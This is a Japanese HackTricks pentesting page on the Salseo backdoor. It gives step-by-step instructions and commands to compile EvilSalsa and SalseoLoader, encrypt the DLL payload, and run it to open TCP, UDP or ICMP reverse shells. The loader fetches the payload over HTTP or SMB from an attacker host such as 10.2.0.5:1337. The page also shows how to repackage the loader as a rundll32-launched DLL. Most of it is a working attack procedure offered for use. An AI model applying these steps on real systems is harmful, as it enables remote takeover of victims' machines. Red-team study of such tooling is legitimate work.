# Salseo
ゼロからヒーローまでAWSハッキングを学ぶ htARTE(HackTricks AWS Red Team Expert) HackTricksをサポートする他の方法: - **HackTricksで企業を宣伝したい**または**HackTricksをPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください! - [**公式PEASS&HackTricksスワッグ**](https://peass.creator-spring.com)を入手する - [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)コレクションを見つける - **💬 [Discordグループ](https://discord.gg/hRep4RUj7f)**に参加するか、[telegramグループ](https://t.me/peass)に参加するか、**Twitter** 🐦で**フォロー**する [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**。** - **ハッキングトリックを共有するために、PRを** [**HackTricks**](https://github.com/carlospolop/hacktricks) **と** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **のGitHubリポジトリに提出してください。**
## バイナリのコンパイル GitHubからソースコードをダウンロードし、**EvilSalsa**と**SalseoLoader**をコンパイルします。コードをコンパイルするには**Visual Studio**が必要です。 これらのプロジェクトを、使用するWindowsボックスのアーキテクチャ用にコンパイルします(Windowsがx64をサポートしている場合は、そのアーキテクチャ用にコンパイルします)。 Visual Studio内で、**左側の"Build"タブ**内の**"Platform Target"**でアーキテクチャを選択できます。 (\*\*このオプションが見つからない場合は、**"Project Tab"**をクリックして、次に**" Properties"**をクリックします) ![](<../.gitbook/assets/image (132).png>) 次に、両方のプロジェクトをビルドします(Build -> Build Solution)(ログ内に実行可能ファイルのパスが表示されます): ![](<../.gitbook/assets/image (1) (2) (1) (1) (1).png>) ## バックドアの準備 まず、**EvilSalsa.dll**をエンコードする必要があります。これを行うには、Pythonスクリプト**encrypterassembly.py**を使用するか、プロジェクト**EncrypterAssembly**をコンパイルできます: ### **Python** ``` python EncrypterAssembly/encrypterassembly.py python EncrypterAssembly/encrypterassembly.py EvilSalsax.dll password evilsalsa.dll.txt ``` ### Windows ### ウィンドウズ ``` EncrypterAssembly.exe EncrypterAssembly.exe EvilSalsax.dll password evilsalsa.dll.txt ``` ## **バックドアの実行** ### **TCPリバースシェルの取得(HTTPを介してエンコードされたdllをダウンロードする)** リバースシェルリスナーとHTTPサーバーを起動して、エンコードされたEvilDalsa.dllを提供することを忘れないでください。 ``` SalseoLoader.exe password http:///evilsalsa.dll.txt reversetcp ``` ### **UDPリバースシェルを取得する(SMBを介してエンコードされたdllをダウンロードする)** リバースシェルリスナーとしてncを起動し、エンコードされたevilsalsaを提供するためのSMBサーバー(impacket-smbserver)を起動することを忘れないでください。 ``` SalseoLoader.exe password \\/folder/evilsalsa.dll.txt reverseudp ``` ### **ICMPリバースシェルを取得する(エンコードされたdllはすでに被害者の中にある)** **今回は、リバースシェルを受け取るためにクライアントに特別なツールが必要です。ダウンロード:** [**https://github.com/inquisb/icmpsh**](https://github.com/inquisb/icmpsh) #### **ICMP応答を無効にする:** ``` sysctl -w net.ipv4.icmp_echo_ignore_all=1 #You finish, you can enable it again running: sysctl -w net.ipv4.icmp_echo_ignore_all=0 ``` #### クライアントを実行する: ``` python icmpsh_m.py "" "" ``` #### 被害者の内部で、salseoの操作を実行します: ``` SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp ``` ## DLLエクスポートメイン関数としてSalseoLoaderをコンパイルする Visual Studioを使用してSalseoLoaderプロジェクトを開きます。 ### メイン関数の前に追加: \[DllExport] ![](<../.gitbook/assets/image (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>) ### このプロジェクトにDllExportをインストール #### **ツール** --> **NuGetパッケージマネージャ** --> **ソリューションのNuGetパッケージを管理...** ![](<../.gitbook/assets/image (3) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>) #### **DllExportパッケージを検索(ブラウズタブを使用)し、インストールを押して(ポップアップを受け入れて)** ![](<../.gitbook/assets/image (4) (1) (1) (1) (1) (1) (1) (1) (1) (1).png>) プロジェクトフォルダに**DllExport.bat**と**DllExport\_Configure.bat**というファイルが表示されます ### DllExportをアンインストール **アンインストール**を押します(はい、奇妙ですが、信じてください、必要です) ![](<../.gitbook/assets/image (5) (1) (1) (2) (1).png>) ### Visual Studioを終了し、DllExport\_configureを実行 Visual Studioを**終了**します その後、**SalseoLoaderフォルダ**に移動し、**DllExport\_Configure.bat**を実行します **x64**を選択します(x64ボックス内で使用する場合、私の場合はそうでした)、**System.Runtime.InteropServices**(**DllExportのNamespace**内)を選択し、**Apply**を押します ![](<../.gitbook/assets/image (7) (1) (1) (1) (1).png>) ### プロジェクトを再度Visual Studioで開く **\[DllExport]**はもはやエラーとしてマークされていません ![](<../.gitbook/assets/image (8) (1).png>) ### ソリューションをビルド **Output Type = Class Library**を選択します(プロジェクト --> SalseoLoaderのプロパティ --> アプリケーション --> Output type = Class Library) ![](<../.gitbook/assets/image (10) (1).png>) **x64プラットフォーム**を選択します(プロジェクト --> SalseoLoaderのプロパティ --> ビルド --> Platform target = x64) ![](<../.gitbook/assets/image (9) (1) (1).png>) ソリューションを**ビルド**するには: Build --> Build Solution(出力コンソール内に新しいDLLのパスが表示されます) ### 生成されたDllをテスト 生成されたDllをテストしたい場所にコピーして貼り付けます。 実行: ``` rundll32.exe SalseoLoader.dll,main ``` もしエラーが表示されない場合、おそらく機能するDLLを持っています!! ## DLLを使用してシェルを取得する **HTTPサーバー**を使用して**ncリスナー**を設定することを忘れないでください ### Powershell ``` $env:pass="password" $env:payload="http://10.2.0.5/evilsalsax64.dll.txt" $env:lhost="10.2.0.5" $env:lport="1337" $env:shell="reversetcp" rundll32.exe SalseoLoader.dll,main ``` ### CMD ### CMD ``` set pass=password set payload=http://10.2.0.5/evilsalsax64.dll.txt set lhost=10.2.0.5 set lport=1337 set shell=reversetcp rundll32.exe SalseoLoader.dll,main ```
htARTE(HackTricks AWS Red Team Expert) を使用して、ゼロからヒーローまでAWSハッキングを学ぶ HackTricks をサポートする他の方法: * **HackTricks で企業を宣伝したい**または **HackTricks をPDFでダウンロードしたい**場合は、[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしてください! * [**公式PEASS&HackTricksスワッグ**](https://peass.creator-spring.com)を入手する * [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発見し、独占的な[**NFTs**](https://opensea.io/collection/the-peass-family)のコレクションを見つける * 💬 [**Discord グループ**](https://discord.gg/hRep4RUj7f)または [**telegram グループ**](https://t.me/peass) に**参加**するか、**Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)を**フォロー**する * **ハッキングトリックを共有するために、PRを** [**HackTricks**](https://github.com/carlospolop/hacktricks) **および** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **のGitHubリポジトリに提出してください。**